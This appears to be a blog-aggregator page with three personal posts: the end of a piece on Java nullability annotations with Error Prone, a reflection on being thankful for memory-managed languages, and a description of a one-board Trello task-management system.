I’ve spotted more than a few potential mistakes we made in our code base this way, and it’s fun to try and minimize nullability. The best option of course is to rewrite the whole thing in Kotlin and forget about the suffix. All puns aside, I can see how Error Prone and its plug-ins can help catch bugs earlier, but it’s going to come at a cost: that of added annotation bloat. You probably don’t want to globally disable too many errors, so @SuppressWarnings is also going to pop up much more often. A difficult team decision to make indeed. Related topics: / java / By Wouter Groeneveld on 25 November 2025. Reply via email.

4 views
Dan Moore! 1 month ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in: web application development. I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it. But my real software education came in the WCTS; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good. I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines. My first job out of school was slinging perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team. One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages. Which are, as Joel Spolsky wrote, similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software using a language that requires memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free. I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

0 views
A Room of My Own 1 month ago

My One-Board Trello Task Management System

So I just came out of a project management webinar — and they shared this really simple task-management method. And I realized that I’ve basically been doing this all along. It’s about moving away from constantly trying to prioritise everything to simply postponing things in a deliberate, thought-out way. And it felt nice to see that this thing I pieced together is actually a “real” method. After years of trying to figure out how to manage all my different tasks, I came up with a system a few years ago that has just worked. I haven’t had to change it in ages. I’ve tried different apps, different methods, different everything — but this setup (which I run in Trello, though you could do it anywhere that has Kanban boards) has stuck. Why Trello? Mostly because it’s free, simple, and the phone app works. It sends reminders to my email (which I’ll see because I keep inbox zero) and as phone pop-ups. The email part is key for me — if it hits my inbox, it won’t get lost. Over time this system grew with me, but this is where I’ve landed: one single board. Just one. Below is the breakdown of my lists on this one board (though I do add more when I need to — if I have extra tasks or a project, like planning a trip, spring cleaning, I’ll add a temporary list for it). When a task or a list is done, I delete it. I don’t archive it, I don’t capture it anywhere else. Done and gone. You can email directly into Trello — I rarely do, but I like knowing I could. This list is where I stick generic things: kids’ school holidays, public and work statutory holidays, my goals for the year, and my very loose 5-year “plan” (which is more vibes than plan, honestly). Because I like the Eisenhower Matrix method (I wrote about it here), I have a few lists that follow that idea: urgent + important — things that actually need to happen pretty soon or right away. Then that elusive middle ground where all the good long-term things live. I’m honestly terrible at this list lately because work has been so full-on — which is also why my personal projects, like blogging, have been basically nonexistent. But this is where those long-term goals go: things like education, personal skill development, improving health and wellness — all the stuff that matters but always falls behind the “do immediately” tasks, and therefore needs to be scheduled. Anything already booked, or anything that repeats: insurance payments, car registration, health appointments, whatever. I put a date on it, set a reminder, and forget about it until it surfaces again. I do this for the whole family. Why not just put it all in my shared (with my husband and son) Google Calendar? Because some things don’t need to be done on the day they pop up. For example: car registration. I set a reminder a month before it’s due. I won’t do it that exact day, but it will pop up, I’ll drag it to “Do Immediately,” and then it gets done. If something goes in Google Calendar, it’s because it happens at an actual fixed time — dinner with a friend, a scheduled doctor’s appointment, whatever. Those don’t go in Trello. This took me a long time to figure out. These are things that don’t need to be done, nothing is riding on them, but they matter (and maybe they shouldn’t) to me. I wrote about some of it here: The Art of Organizing (Things That Don’t Need to Be Organized), The Journal Project I Can’t Quit, and The Cost of Organizing Ideas – But I Keep Doing It Anyway. An example is my digital photo books.
I use Mixbook or Shutterfly, and the kids love having the physical copy of a digital photobook to leaf through. And so do I. I make ones for big trips too. But then I realised: if those companies disappear, all my digital books vanish. You can’t download them as PDFs or export them in any meaningful way (apart from having the printed copies — but what if my house burns down, or I want another copy?). After researching and asking around, the only real solution seems to be opening them full screen, taking screenshots, and saving them in Day One. It’s a huge project (well, potentially; once I start working on something and break it down into smaller tasks, it gets done). But I’m not touching it right now. However, having it on the list gets it out of my head. The other lists I have on my board are: I like knowing how much I spend and when things renew. I regularly cancel things. For example, Kindle Unlimited: I sign up when there’s a deal or when I need it, then cancel again. Same with Apple TV — if there’s a show I want, I get it for a month, then drop it. I hate having too many subscriptions that sit there unused. I didn’t put these in recurring tasks because some documents are valid for years or even decades. So I just keep a list. Sometimes I attach the files, but I don’t fully trust Trello with sensitive things, so the actual scanned documents live in my Dropbox. Renovations, things I want to study, photo books I still want to make. These live even further out than the “may or may not do” list. Not urgent, not actionable, probably not happening soon — but I don’t want to forget about them either. And most importantly, I don’t want to think about them. When I do a review, I’ll see them, remember them, and that’s enough. It’s simple. It’s not over-engineered. It’s not automated to death. It’s easy to maintain. And most importantly: things actually get done. My lists used to be huge and chaotic. This isn’t. NOTE: For work tasks I use Microsoft To Do, since it plugs straight into the rest of the Microsoft ecosystem we use.

4 views